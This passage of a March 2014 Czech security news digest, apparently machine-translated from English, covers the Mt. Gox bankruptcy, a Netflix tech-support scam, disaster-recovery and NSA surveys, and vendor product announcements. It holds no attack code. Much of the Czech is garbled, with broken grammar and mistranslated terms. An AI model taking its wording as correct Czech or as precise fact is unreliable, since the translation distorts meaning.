záměrně uchovává soukromý klíč uživatele, název místnosti, nick, kamarádi, a další identifikační údaje v konfiguračním souboru, "dodal. "To vše může být použita k vaší identifikaci, past konferenční místnosti, a další informace, které by mohly vystavit. A bohužel, když jsem se to mohlo přijít jen pár minut, jsem si jistý, že ti špatní / federálové / etc. Jsou přijít na to taky. To lze obnovit forenzně od většiny komerčních forenzních nástrojů na zařízení jakéhokoli modelu.
73% firem jsou připraveni pro obnovu po havárii
10.3.2014 Bezpečnost
Disaster Recovery připravenost (DRP) Rada oznámila poznatky z jeho srovnávací studie, které ukazují, že 73% dotazovaných organizací po celém světě nejsou přijaly přiměřená opatření na ochranu svých dat a IT systémů. Špatné plánování, testování a technologické nedostatky vedly k více než $ 5M stojí za kritických aplikací selhání, datových center výpadky a ztráty dat. Studie dotázaných více než 1000 organizací, od malých firem až po velké podniky, aby jim pomohla srovnávací připravenost pro obnovu kritických IT systémů ve virtuálních prostředích. Klíčová zjištění patří:
64% respondentů průzkumu tvrdí, že zotavení po havárii (DR), rozpočet organizace jejich hry je neadekvátní a nedostatečně.
Více než 60% uvádí, že nemají plně dokumentovaný plán obnovy po havárii, a mezi menšinu, která dělá, 23% respondentů nikdy testovány těchto plánů.
Přibližně jedna třetina říká, že testovat svůj plán jen jednou nebo dvakrát za rok, a více než 65% z těchto organizací neprojdou vlastní DR testy.
78% respondentů zažilo výpadky kritických aplikací, a této skupiny, 63% tvrdí, že ztráty se pohybovaly od několika tisíc dolarů na více než $ 5M.
Z respondentů, kteří zažili výpadky, přibližně 28% tvrdí, že jejich organizace ztrátě funkčnosti datových center až několik týdnů.
Většina respondentů dotazovaných na vědomí jejich nedostatek v oblasti připravenosti na katastrofy, a uvádí, že jejich organizace je nyní plánuje nebo pozmění své implementační strategii. Některé organizace již podnikla kroky ke zlepšení jejich připravenosti na katastrofy, které používají osvědčené praktiky, které zahrnují:
Budování komplexní DR plán na zotavení aplikace, sítě a služby pro obchodníky, včetně primární a sekundární servery.
Definování času zotavení cílů (RTOS) a cíle bod obnovení (RPOS) pro kritické aplikace na stanovených správné očekávání a předpoklady pro řízení a zaměstnance.
Automatizace časté testování obnovy kritických aplikací ověřit své schopnosti obnovy v rámci stanovených výzkumné organizace / RPOS.
Mt. GOX uživatelé cílených s falešnými sliby ztracené Bitcoin zotavení
9.3.2014 Kriminalita
Bitcoin výměnu Mt. Gox je sdíleno podrobnosti o otázky, které k němu vedly podání návrh na konkurz ochranu , stejně jako malware trhovců začali využívat zoufalství postižené uživatele "a touha obnovit své ztracené bitcoins. burza zveřejnila oznámení regarding konkurzní aplikace s Tokio okresní soud, ve kterém je vysvětleno, že jeho závazky převyšují jeho majetek, a že tato situace může být spojena se ztrátou bitcoins a prostředků klientů:
Na začátku února 2014 nezákonný přístup přes zneužití chyby v Bitcoin systému vedla k nárůstu neúplných přenosu Bitcoin transakcí a my jsme zjistili, že existuje možnost, že bitcoins byl nezákonně prošel zneužití této chyby. Jak Výsledkem našeho vnitřního vyšetřování, jsme zjistili, že velké množství bitcoins zmizel. Ačkoli kompletní rozsah není dosud znám, jsme zjistili, že asi 750.000 bitcoins uložené uživateli a přibližně 100.000 bitcoins patří nám zmizel. Jsme přesvědčeni, že je vysoká pravděpodobnost, že tyto bitcoins byly ukradeny v důsledku zneužití této chyby a jsme požádali odborníka se podívat na možnosti trestního oznámení a provádět správné postupy. Téhož dne (24.), jsme zjistili velké rozdíly mezi množstvím peněžních prostředků ve finančních institucích a vložené částky od našich uživatelů. Částky jsou stále v šetření a mohou se lišit, ale přiblížit 2,8 miliardy JPY. jsme se zjistit příčiny těchto problémů. Vzhledem k tomu, tam jsou asi různé příčiny včetně hackingu třetími stranami, musíme prozkoumat obrovské množství hlášení o transakcích s cílem zjistit pravdu. K tomuto datu, nemůžeme potvrdit přesné množství chybějících vkladů finančních prostředků a celkovou výši bitcoins, které zmizely. Poté, co jsme zjistili, že bitcoins zmizel a rozdíly mezi v peněžních prostředcích a zůstatky, usoudili jsme, že by bylo obtížné, aby i nadále naše aktivity normálně a proto uzavřen na našich stránkách v poledne na 25. (Japonsko času).
Jsou také použity pro povolení k "obnově" Mt. GOX "pod dohledem soudu v právně organizované řízení," aby mohli splatit dluhy postižených uživatelů, kteří jsou vyzváni, aby se obraťte na nově zřízené call centra, pokud máte jakékoliv dotazy. Do té doby, podvody nabízí naději o vrácení ukradených bitcoins, ale dodávající malware se objevily. Malwarebytes 'Chris Boyd varuje o takový podvod, který vybízí uživatelům sledovat video, které zřejmě vysvětluje, že "Mt. GOX vrátí všechny ztracené Bitcoins." Ale, jsou vyzváni, ke stažení Adobe Flash Player, aby byli schopni se dívat na to.
Naneštěstí pro ně, nabídl software je škodlivý spustitelný zabalený v rar souboru.. Povaha malwaru v otázce je stále neznámý, ale tam moci být žádná pochybnost, že to přinese jen smutek se již ubohých uživatelů.
Cyber podvodníci půjde po lékařských záznamů další
9.3.2014 Hrozby
Jako bezpečnostní firmy a orgány činné v trestním řízení nadále spolupracovat a úspěšně sundat botnety, bude počítačoví podvodníci budou nuceni hledat nové a lukrativní cílů, a to zejména ty, které jsou špatně zajištěné.
V panelu se konala na konferenci RSA která se konala minulý týden v San Franciscu, tým Microsoft / Agari za Citadely botnet takedown řekl, že tyto nové cíle bude pravděpodobně ve zdravotnictví. Poté vysvětluje , jak šli kolem provádějící takedown, ale vysvětlil důvod své přesvědčení, že zdravotní systémy IT a nemocniční databáze jsou další v řadě k porušení dat. generální ředitel Agari Patrick Peterson sdíleny, že cena lékařských záznamů, které patří do jedné osobě by mohlo přinést asi 60 dolarů, zatímco jeden záznam kreditní kartou se vyplatí pár dolarů v podzemních trzích. On také poukázal na to, že mezi odvětví tak daleko, finančních organizací a sociálních sítí zaměřených tvrdě pracovali na ochranu svých zákazníků, a dělali pokusy počítačoví zločinci "složitější, a proto dražší. Na Na druhé straně, většina zdravotnického průmyslu není následovali. Navíc k tomu všemu, lékařské záznamy, aby podvodníci velmi cenné informace o cíli, které mohou být zneužity k montáži účinných útoků sociálního inženýrství, poznamenal Richard Boscovich, asistentka generální rada s Microsoft Digital Zločiny jednotka. Dalo by se věřit, že informace, jako je ta obsažená v lékařských záznamů by mohlo být, že užitečné, ale v rukou kvalifikovaných sociálních inženýrů se může obrátit na zlato. "Tihle kluci jsou dobří, jsme viděli, že se stalo," komentoval Boscovich.
Uživatelé Netflix cílené na aktivní technickou podporu podvod
9.3.2014 Kriminalita | Incidenty
Bezpečnostní výzkumník Malwarebytes 'Jerome Segura nedávno analyzoval spíše tvůrčí technickou podporu podvod, který se aktivně zaměřenou na uživatele Netflix. Neříká, jak se potenciální cíle lákal na falešnou Netflix přihlašovací stránku, která je prvním krokem k podvést, ale je to velmi pravděpodobné, že obdrží falešné Netflix e-mail je varování, že jejich účet byl napaden. Jakmile předložit své přihlašovací údaje na falešné přihlašovací stránky, které se potýkají s upozorněním, říká jejich účet byl pozastaven a nutit je, aby volání na konkrétní daň bez telefonní číslo: "Když jsem volal na číslo, rogue podpora zástupce se mě stáhnout" Netflix podpůrného softwaru "," Segura sdílel jeho dobrodružství s podvodníky. software v otázce je TeamViewer, populární program pro vzdálené přihlašování, že podvodníci poté použít k připojení k cílovému PC. Scammer snažil se ho přesvědčit, že jeho účet Netflix byla pozastavena z důvodu nezákonné činnosti, že jeho počítač byl hacknutý, a že by se nechal Microsoft Certified Technician opravit svůj počítač - a zaplatit téměř 400 dolarů za službu. "Během našeho rozhovoru, že podvodníci nejsou nečinné," poznamenal. "Oni šli přes mé osobní soubory a nahrát ty, které vypadalo zajímavé pro ně, jako" bankovní 2013.doc '. " "Další zvláštní věc je, když mě požádal o obrázku ID a fotografie z mé kreditní karty od Internetu .. není bezpečné, a oni potřebovali důkaz mé identity jsem nemohl vyrobit jeden, proto se aktivuje svou webovou kameru, takže jsem mohl ukázat, že karty, které jim na jejich obrazovce " Jeho analýza říká, že podvod je nový a stále pokračuje - doména oni používali byl zaregistrován a nedávno aktualizován - tak varuje uživatele, aby byl opatrný. V tomto konkrétním podvod, mohli by přijít o všechno:. Peníze, důvěrné soubory, a osobní a informace o účtu Pokud chcete vidět a slyšet, jak celý scamming proces rozvíjí.
Cisco nabízí 300k $ bezpečnostních řešení internetu věcí
9.3.2014 Bezpečnost
Cisco uvedla na trh novou soutěž a volá na "vizionářů, inovátorů a realizátorů" navrhnout praktická řešení pro otázky, které ovlivňují bezpečnost internetu věcí.
"Jsme propojení více našeho světa každý den přes inteligentní, IP-umožnil zařízení od domácích spotřebičů, zdravotnických zařízení a průmyslových zařízení. Tyto nové připojená zařízení, které nabízejí nové způsoby, jak sdílet informace, a mění způsob, jakým žijeme," říká Christopher Young, senior viceprezident pro skupinu zabezpečení společnosti Cisco. "Přesto, jak naše životy spojené růst a stát bohatší, potřeba nového bezpečnostního modelu stává ještě kritičtější. To vyžaduje, aby pracujeme společně jako komunita najít inovativní řešení Ujistěte se, že internet věcí bezpečně plní svůj potenciál a zachovává pohodlí, že to představuje. " Young oznámila Challenge minulý týden ve svém proslovu na konferenci RSA , a nabídl více informací na blogu . Internet věcí Security Grand se Challenge má cenu pot ve výši $ 300,000 - maximálně 6 výherců obdrží ceny od $ 50,000 k 75,000 dolar. Také dobré vědět, že všichni účastníci budou mít příležitost k další spolupráci s Cisco mimo tuto výzvu. proveditelnosti návrhů ", škálovatelnost, výkon a snadné použití bude posuzovat hodnotící porota složená z pěti inženýrů Cisco a vědců, včetně Dave Evans, společnosti Chief Futuristické. Lhůta pro podání nabídek je 17.června 2014 a vítězové budou vyhlášeni a jejich řešení představila na internetu věcí Světového fóra letos na podzim.
D-Link představuje přenosný 11AC router a nabíječky
9.3.2014 Hardware
D-Link oznámila, že se nyní prodává na světě první přenosné 11AC router, Wi-Fi AC750 Portable Router a nabíječka (DIR-510L). Tento nejnovější přírůstek do rodiny D-Link o řešení konektivity umožňuje mobilním uživatelům rychle a snadno vytvořit Wi-Fi hotspot z existujícího připojení k internetu, ať už je to 3G/4G, Wi-Fi nebo Ethernet, zatímco on-the-go. Přenosný Wi-Fi Router je také vybaven vysokokapacitní dobíjecí baterie 4000 mAh, který dokáže nabíjení mobilních zařízení. Navíc se zdarma mydlink SharePort mobilní aplikace, mohou uživatelé nahrávat, stahovat a streamovat multimédia a dokumenty na paměťovou jednotku připojenou k jednomu ze dvou portů USB přenosný routeru z libovolného místa na světě. Začlenění nejnovější technologií Wireless AC750, Wi- Fi Portable Router a nabíječka nabízí uživatelům vysokou rychlost a řadu pokročilých funkcí, zajišťující vynikající rozsah a přenos dat do a z připojených zařízení. Využití technologií duálního pásma, aby se vyhnula radio přetížení a rušení, DIR-510L lze dodat celkem 750Mbps využití kombinovaných propustnost svých 2,4 GHz a 5GHz pásma. Kromě toho, každá skupina může fungovat jako samostatná Wi-Fi sítě, poskytuje možnost přizpůsobit síť podle potřeby připojení a dokonce nakonfigurovat jako host zónu poskytnout přístup k internetu pro návštěvníky bez poskytnutí přístupu ke zbytku sítě. DIR -510L poskytuje okamžité sdílení jakéhokoliv internetového připojení s vyšší zabezpečení brány firewall při připojení k sdílené veřejné připojení, a nabízí následující vlastnosti výrobku:
Vysoká kapacita baterie - Vestavěná nabíjecí baterie 4000mAh udrží gadgets nabitá a připravená k použití, včetně tablet
Dva porty USB - Umožňuje současné sdílení souborů a připojení modemu 3G/4G/LTE, zapojte do 3G/4G/LTE USB modem pro sdílení připojení k Internetu nebo použít USB flash disk pro přenos obsahu na různých mobilních zařízeních
mydlink SharePort - umožňuje uživatelům streamovat obsah z připojeného USB disku na více mobilních zařízení pomocí bezplatné mobilní aplikace
Snadné nastavení - Automaticky detekuje typ připojení - broadband router, mobilní směrovač, hotspot - pro optimální rychlost a úspory, uživatelsky přívětivé rozhraní ukládá informace o připojení, které pomohou udržet všechna zařízení připojit automaticky
Universal Plug and Play (UPnP) a vestavěný DLNA Server - Streams multimediální hladce a bezpečně přes přístrojů a zařízení, včetně chytrých televizorů, herních konzolí a mediálních PC
Wi-Fi AC750 Portable Router a nabíječka (DIR-510L), je nyní k dispozici na Amazon.com, Frys.com, a celé sítě D-Link maloobchodní a e-tail prodejen za $ 99.99.
TrustyCon jednání zpřístupněny na videu
9.3.2014 Konference
Jak oznámil , TrustyCon INFOSEC konference, zřízená bezpečnostní poradenská firma ISEC Partners, Electronic Frontier Foundation (EFF) a DEF CON a koná současně jako RSA Conference USA 2014 , byl vypracován docela dav. S reproduktory, jako je F-Secure je CRO Mikko Hypponen, cryptographer a bezpečnost počítačový expert Bruce Schneier, a několik dalších INFOSEC svítidla that bojkotovali konferenci RSA probuzení veřejných obvinění, že RSA přijato 10 milionů dolarů z NSA na backdoor its Bsafe řešení konference zabývat otázkou důvěry v technologii společnosti a jejich nabídky, jakož i vlády, a jak bychom mohli udělat druhý přepínač od špehování "všichni" na špionáž zločinců. Netrvalo dlouho a organizátorů vydat video s hodnotě více než sedmi hodinách rozhovorů od událost.
Trendy tvarování mobilní forenzní v roce 2014
9.3.2014 Mobil
Mobile poskytovatelem forenzních Cellebrite zkoumal svou zákaznickou základnu a vedli rozhovory s předními mobilními znalců a analytiků zahrnující průmysl, žádá svůj názor na top trendy tvarování mobilní forenzní v letošním roce.
Podle výzkumu, můžeme očekávat následující v měsících:
Spotřebitelé stále více spoléhají na více zařízeních: Vyšetřovatelé je pravděpodobné, že se ocitnou analýzu dat z více než jednoho mobilního telefonu, tabletu, GPS zařízení a jiných mobilních médií, a to nejen na jeden případ, ale také na osobu. Jako výsledek, mobilní forenzní vyšetřování předstihl počítačové forenzní, se poměr zvyšuje až o trojnásobek v průběhu posledních tří let. "Tento trend ukazuje, že jako mobilní zařízení stávají silnější a snadnější k použití, více lidí závisí na nich řídit různé aspekty své práce a osobního života," řekla Cindy Murphy, detektiv s policejní oddělení Madison Wisconsin. "To znamená, že vyšetřovatelé potřebují způsob, jak spravovat více zdrojů dat získat ucelený obraz o životě každého člověka, v časovém rámci, který jim nejvíce provede informace."
Extrakce a analýza na místní úrovni, přesouvá z laboratoře do terénu: Vzhledem k rychlému nárůstu mobilních zařízení důkazů, mohou orgány činné v trestním řízení již spoléhat pouze na forenzní laboratoře na státní a federální úrovni. Ať už jako součást hledání incidentu zatknout, forenzní náhled digitálních médií při výkonu povolení k domovní prohlídce nebo souhlasu hledat při hodnocení stížnost, téměř 44 procent respondentů se extrahovat mobilní data v poli. "Digitální forenzní je stále demokratizovat," řekl D / Sgt Peter Salter ze služby policie Severního Irska eCrime jednotky. "Specializované odborné znalosti budou vždy důležitým strategickým prvkem v rámci celkové schopnosti produkovat solidní důkaz pro soud. Nicméně, odborníci a případové vyšetřovatelé stejně tak prospěch z mít možnost zkoumat exponáty na místě a na frontové linii. Rámci dohodnutých postupů, tento přístup umožňuje vyšetřovatelům určit, které vystavuje vyžadují hlubší šetření, jakož i poskytování přímých vyšetřovatelům s rychlým, řízený přístup k digitálním důkazů s cílem informovat své kritické rozhodování. "
Mobilní důkaz dostane sociální, datové zdroje diverzifikovat: Tam je přibližně 1,19 miliardy aktivních uživatelů na Facebooku, 300 miliard tweets odeslané na Twitteru měsíčně, a 16 miliard fotografie sdílené na Instagram měsíčně. Navíc, 2013 viděl více než 100 miliard stahování mobilních aplikací. Výsledek? Údaje žijící v sociálních aplikací se stala kriticky důležité, protože výrazně vzrostl počet vyšetřování trestných činů týkajících se data shromážděná z těchto aplikací. Průzkum Cellebrite odhalil, že 77 procent respondentů věří, že mobilní aplikace jsou nejdůležitější zdroj dat, následuje mrak na 71 procent. "Dokumentace různé komunikační kanály, které jsou součástí trestného činu (např. Facebook, YouTube, atd.), stejně jako ty, které mohou vést k novým svědků, obětí, podezřelých a alternativní pachatelů je stále důležitější," řekl John Carney, Chief Technology Officer na Carney Forenzní. "Je nutné, aby souvislostí dat mobilních zařízení se sociálními daty z on-line osobností lidí."
Big dat, zaměřené analýzy: S množstvím digitálních důkazů rostoucí z GB na TB v mnoha případech, analýzy dat se stává ještě větší význam pro pochopení mobilní důkazy. Vyšetřovatelé musí být schopen oddělit relevantní data z bezvýznamné, a pak se snadno pochopit a vysvětlit rozdíly na sebe, kolegové, advokáti / advokátů a porotci. "Schopnost vizualizovat časové osy, zeměpisných oblastí, a obsah může být právě rozdíl v tom, jak porotci, advokáty / právníci a jiní vnímají význam dat, která extrahovat," řekl Simon Lang, digitální forenzní manažer s SYTECH.
Mobilní malware dopady občanské a trestní vyšetřování: V roce 2013, odborníci z odvětví předpovídali nárůst mobilního malwaru a následnou potřebu pro forenzní zkoušející pochopit, jak rozpoznat a analyzovat ji spolu s dalšími důkazy. "Malware jako faktor podvodu, intimní partnerské zneužívání, krádež duševního vlastnictví a obchodních tajemství a jiných trestných činů, je něco, co všichni vyšetřovatelé budou muset zvážit, s každým mobilním zařízením se setkat," řekl Carlos Cajigas, školení ředitel a senior forenzní Zkoušející se Epyx Forenzní. "Jsou nezbytné pro vývoj úrovně odborné způsobilosti vyšetřovatelé třeba, aby se tato hodnocení školení a praktické zkušenosti."
"Nárůst využívání mobilních telefonů a spotřební spoléhání se na těchto zařízeních se přímo zvýšil složitost trestního vyšetřování," řekl Ron Serber, Cellebrite co-CEO. "Aby bylo zajištěno, že shromážděné mobilních dat se promítá do forenzně pádných důkazů, informovanost, vzdělávání a odborné přípravy bude mít zásadní význam pro mobilní forenzní průmyslu v letošním roce."
Rychle identifikovat a jednat v otázkách pro zabezpečení koncových bodů
8.3.2014 Zabezpečení
Promisec oznámila plány na Promisec bezúhonnost, série cloudových nabídek, které pomáhají malým až středně velké podniky se zabezpečením koncových bodů a sanace. kompletní sadu nabídky umožňuje IT organizacím zajistit soulad, bránit proti rostoucímu počtu kybernetických hrozeb ovlivňují podnikání dnes a ověřit integritu koncových bodů napříč všemi nasazeny bezpečnosti a IT konečnými technologií.
Podle nedávné zprávy společnosti Gartner, "Malware je již uvnitř vaší organizace, s tím vypořádat," publikoval 12.2.2014, "bezpečnostní organizace, musí předpokládat, že jsou ohrožena, a proto investovat do schopností detektivní, které poskytují průběžné sledování pro vzory a chování svědčící o zlý úmysl. "Za tímto účelem, říká zpráva," nová třída detekce koncového bodu a odpovědi (ETDR) prodejci se začínají zaplnit mezery, které zůstávají tradiční ochrany koncových bodů platformy (EPP) Suites. [Oni] poskytnout "ukazatele kompromisů" (IOCs) vést úsilí o odhalování a vyšetřování nástroje v reálném čase, které umožňují rychlé výslechu koncových bodů a historie koncových bodů. " Promisec Integrity poskytuje nepřetržité monitorování pro pokročilou detekci hrozeb tím vydělávat na kolektivní inteligence od stávající nástroje pro zabezpečení a správu, aby poskytují jistotu, že všechny nástroje a procesy jsou funkční, agenti jsou aktuální, a software je záplatované. . To poskytuje IT organizacím možnost zlepšit jejich dopadající dobu odezvy, a tak omezit obchodní dopad Další plánované přírůstky Promisec Integrita zahrnuje:
Endpoint kontrola - průběžné sledování služba, která bude testovat a hlásit na celý koncový bod životního prostředí odhalit jeho stav zabezpečení, včetně odhalování neoprávněných žádostí, potvrzení antivirus a řešení pro správu SCCM / oprava fungují správně, a zajistit dodržování podnikových zásad IT
Tamper detekce - validační službu souboru, který potvrdí, zda jsou soubory, nebo s ním manipulovala poškozen útokem, ať už jako se to děje, nebo po útoku
Pro řešení krizí - služba Incident Response, která bude zametat zákazníků koncové body pro konkrétní otázky-jako je konkrétní malware útoku nebo starší verzi softwaru, který je náchylný k hack-a nabídky na místě sanace a podávání zpráv o aktuálním stavu těchto koncového bodu prostředí.
"Promisec Integrity je jako tlačítko" nepanikařte ", které mohou rychle poskytnout klid mysli a postup-pro malé a středně velké podniky, které se musí dostat před nejnovějšími hrozbami ještě před jejich negativní dopad na firemní IP, operační účinnosti a, nakonec, značka důvěra a ziskovost, "řekl Dan Ross, generální ředitel, Promisec. Společnost bude odhaluje konkrétní řešení jsou k dispozici pro Promisec integritu až do konce roku 2014, začíná se schopností detekce cyber v nadcházejících týdnech.
RSA Účastníci konference ambivalentní o taktice NSA
8.3.2014 Konference
Thycotic Software oznámila výsledky průzkumu 341 RSA Conference USA 2014 účastníků, která zjistila, že méně než polovina (48%) z pollees pocit, že NSA překročil své hranice ve svém dohledu amerických občanů. Po rozsáhlé kritice agentury v hlavní projevy Tato data ukazují, že mnozí odborníci na bezpečnost v úvahu jeho činnosti nezbytné k americkému kybernetické obrany. Současně, tři čtvrtiny (75%) respondentů, bez ohledu na jejich postoj k NSA, myslím, že ti, kteří bojkotovali RSA konference v letošním roce mají právo jejich názoru, a 9% dokonce uvažuje se k nim připojili. Pouze 17% uvedlo, ti, kteří bojkotovali RSA jsou pozornost azyl. Průzkum také odhalil rozšířené přesvědčení, že zneužití privilegovaného přístupu dochází v rámci organizace úcastník. Pouze 19% respondentů věří, že takový přístup, často odkazoval se na jako "klíče království", je používán správně. . V čem může signalizovat rezignaci na tuto skutečnost, zhruba jeden z pěti (19%) RSA attendees naznačují, že by ještě najmout Edward Snowdena, dána možnost Další klíčové závěry z průzkumu patří:
Z 52% respondentů, kteří neměli naznačují, že NSA překračuje své hranice, 21% věří, že vláda musí být vědomi toho, komunikačních údajů občanů z cílem lépe chránit z teroristické činnosti, a 31% uvedlo, že jsou v rozporu o problém, a že zatímco oni mají co skrývat, jsou obavy o ztrátu soukromí.
Případně, 48% respondentů jednoznačně říci, NSA se překročit jeho hranice v jeho sledování občanů USA.
61% respondentů na vědomí, že buď věděli, že zaměstnanci v rámci jejich společnosti byly zneužívány privilegovaný přístup (24%) nebo že je pravděpodobné, že mají (37%). Dalších 20% nejste jisti, zda se to stalo.
Bohužel, průzkum neříká, zda pollees byli američtí občané nebo ne.
Rizikové Analytics jako služba Brinqa
8.3.2014 Bezpečnost
Brinqa oznámil první Risk Analytics v tomto průmyslovém odvětví jako službu nabízet. "Risk Analytics jako Service je zaměřen na firmy, které se snaží najít nákladově efektivní a účinný způsob, jak extrahovat znalosti z jejich bezpečnost a provozní údaje, které jim pomohou identitu jejich skutečný rizika a činit lepší informovaná obchodní rozhodnutí, "řekl Amad Fida, generální ředitel, Brinqa. "Naše Cloud řešení umožňuje tyto společnosti vzdát se výdaje na GRC systému šestimístný a místo toho platit za to, co oni používají se zaměřením na konkrétní sadu funkcí, které jsou nezbytné pro jejich potřeby."
Brinqa Risk Analytics jako službu nabízet je postaven na základech Brinqa Enterprise Platform. Platforma poskytuje přehled organizací do všech základních údajů a potřebné metriky aktivně kompenzovat potenciální hrozby. . Prostřednictvím kompletní automatizaci agregace dat a analýzu rizik, zkracuje dobu odezvy na nové hrozby a snižuje námahu a náklady pro organizace tím, že využije společnou platformu v rámci celého podniku Klíčové vlastnosti produktu patří:
Agregace dat ze zdrojů z Internetu pomocí zabezpečeného cloud konektor server brány
Pre-postavený a připravený k použití aplikací, jako je Application Security Risk, Service Provider rizik a technologických rizik Analytics, žádné úpravy nebo kódování požadované
Kompletní šifrování dat, data v klidu, stejně jako údaje v pohybu
Advance analytické použití algoritmů strojového učení
Pay per zpoplatnění použití
Brinqa je první, která nabízí cenově dostupné cloud-based analytický rizikové řešení, které zahrnuje kompletní automatizaci a kontinuální sledování a podávání zpráv o riziku, které mohou být použity non-Fortune 1000 společností.
Mt. Vyměňovat soubory GOX Bitcoin pro konkurzní ochrany
8.3.2014 Ochrany
Po sérii špatných zpráv z Mt. GOX je konečný úder svým uživatelům: prominentní výměna Bitcoin již podala návrh na konkurs se Tokio Okresního soudu v Japonsku. Tento krok je věřil být - alespoň částečně - reakce na úřad amerického zastupitelství v New Yorku podání obsílku proti společnost (Mt. GOX je registrován jako obchodní peníze-služeb v USA), ale to může mít také něco do činění s tím, že japonské finanční úřady, policie, ministerstvo financí a jiní jsou při pohledu na náhlé vypnutí populární Japan bázi výměny v úterý. uzavření výměny znamená, že zákazníci nemohou přistupovat své účty a stáhnout bitcoins uložené tam. Zda budou mít příležitost k tomu, aby v budoucnu se uvidí. Ve podání, Mt. GOX uvedl, že 750.000 z bitcoins svých zákazníků a 100.000 z jeho vlastní byl ztracen, která úzce koresponduje s čísly uvedených v dokumentu, který byl v oběhu na internetu za posledních pár dní. pravdivost a zdroj dokumentu je nebyly objeveny, a Mt. GOX řekl, že nebyli autoři. krádež byla zřejmě výsledkem chyby v Bitcoin software, který umožnil poškozené transakce, a jeho existence a využívání způsobilo několik Bitcoin výměnu - včetně Mt. GOX - k zastavení obchodování a výběry na začátku tohoto měsíce. Obchodování byla později obnovena, ale odstoupení nebylo možné, protože. Mt. GOX CEO Mark Karpeles, který nedávno odstoupil z rady Bitcoin nadace, se snažil ujistit uživatele, že pracují na řešení, a že je stále v Japonsku. Zákazníci jsou, pochopitelně, vztek a byly odvzdušnění i on-line a protestovali před Mt. Sídlo GOX. Bohužel, toto a jiné mimořádné události týkající se další výměny Bitcoin ukazují nevýhody digitální měny v té podobě, jak se v současné době, stejně jako použité technologie. Není pochyb o tom, že myšlenka digitální měny získal tah s uživateli internetu a investory, ale Některé změny budou muset být provedeny za to realizovat svůj plný potenciál. bude zapotřebí jasně definované zákony, politiky a mnohem větší transparentnost. Do té doby, bude počáteční obtíže pokračovat, a je třeba očekávat - ne, že to potěší Mt. Zákazníci GOX a další majitelé digitálních měn, které ji ztraceny v důsledku krádeží.
Budoucnost řízení přístupu podle HID
8.3.2014 Bezpečnost
Nové bezpečnostní prostředí, ve kterém uživatelé budou mít bezproblémovou práci při používání aplikací a cloud-based služeb, přístup k datům, a otevření dveří se objevuje. Toto prostředí se bude pohybovat průmyslu nad rámec tradičních silných autentizačních přístupů, karty a čtečky zjednodušit a zlepšit jak vytvářet, spravovat a používat identity napříč mnoha různých aplikací na obou čipových karet a smartphony.
Bude také umožní lepší účinnost prostřednictvím centralizace pověření řízením pro více kontroly logický a fyzický přístup identit napříč IT prostředků a zařízení. V bílé knize s názvem "Konvergence IT a fyzické kontroly přístupu," HID Global identifikovat klíčové události, které jsou hnací průmyslu směrem k těsnější integraci pověření řízením a více bezešvé uživatelské zkušenosti pro řízení jak logický a fyzický přístup k:
Stěhování za karty: nejen, že organizace konsolidaci aplikací na jediné pověření, které lze použít k ovládání přístupu k IT zdrojů a zařízení, které se pohybují také tato pověření multi-aplikace na chytré telefony pro lepší pohodlí. Díky tomu bude možné pro smartphony udělit přístup ke všemu, co ode dveří, aby údaje, na cloudu.
Stěhování nad čtenářů: Jak uživatelé přejít na modelu, kde se jednoduše klepněte jejich čipovou kartu nebo smartphone do osobního tabletu nebo notebooku k ověřování k síti, bude potřeba pro samostatnou čtečku karet. Uživatelé budou moci používat svůj telefon, nebo čipovou kartu "klepněte na" k VPN, bezdrátových sítí, firemní intranety, cloud-a webových aplikací, single-sign-on (SSO), klientů a dalších IT zdrojů.
Stěhování za nákladné a složité PKI řešení: Příchod obchodního Ověření identity (CIV) karty umožňuje organizacím implementovat silnou autentizaci pro přístup k datům a otevírání dveří, aniž byste museli kupovat certifikáty z trust anchor nebo zaplatit roční udržovací poplatky, jako je tomu s PKI na základě vládní Osobní Ověření identity (PIV) karty.
Přechod na skutečné řízení konvergovaných přístupu: konvergované řízení přístupu karet dnes jsou obvykle buď dual-čipových karet (kde je jeden čip používá pro PACS a jiné logický přístup), nebo dual-rozhraní čipových karet (nesoucí jeden PKI, který je schopen čip s oběma kontaktní a bezkontaktní rozhraní podporovat jak fyzické a logické řízení přístupu). V budoucnosti budou uživatelé mít třetí možnost pověření pomocí datového modelu, který může představovat jakýkoli typ informací o totožnosti, na paměťové kartě nebo uvnitř telefonu. To zahrnuje PACS pověření, jakož i OTP pro silnou autentizaci, z nichž všechny mohou být použity bez problémů na více systémových architektur. K dispozici bude jedna sada konvergovaných bezpečnostní politiky, které zahrnují jak fyzické a logické domény, jednu pověření, a jeden protokol auditu.
Kromě trendům směřujícím k nové technologie, které umožňují pohodlné a velmi bezpečné silnou autentizaci, bude tato technologie také umožňují organizacím využívat existující infrastrukturu pro správu pověření pro dosažení skutečnou konvergenci prostřednictvím jediného zařízení, které mohou být použity pro mnoho bezpečnostní aplikace. Tím se eliminuje potřebu samostatných procesů pro poskytování a zápis IT a PACS identit. Namísto toho bude možné uplatňovat jednotný soubor pracovních postupů na jedné sady spravovaných identit pro organizační sblížení.
1 ve 4 evropských uživatelů internetu zkušenosti blokování internetového obsahu
8.3.2014 Bezpečnost
. 24% evropských uživatelů internetu tvrdí, že je zabráněno jejich poskytovatelů ze sledování videa, poslech hudby nebo pomocí jiných aplikací podle vlastního výběru, podle nového průzkumu Eurobarometru z 28.000 občanů v celé EU Průzkum zjistil, že:
41% máte potíže sledování videa na mobilním zařízení a 37% na spojení v pevné Internet na doma (z důvodu omezení rychlosti nebo blokování obsahu)
23% problémů zážitek z poslechu hudby na svém mobilním zařízení,
23% Zkušenosti problémy Nahrávání obsahu na Facebooku, blogu, fóru nebo prostřednictvím svého mobilního zařízení
19% Zkušenosti problémy hraní on-line her na stole počítač,
9% máte potíže s využitím internetové dodáno telefonní hovory
To také ukazuje, že:
60% zákazníků neví, svůj internetový rychlost.
Z těch, kteří vědí, jejich rychlost, 26% tvrdí, že se jim nedostává rychlost, která odpovídá podmínky jejich smlouvy.
40% všech respondentů zažilo připojení k internetu rozebrat.
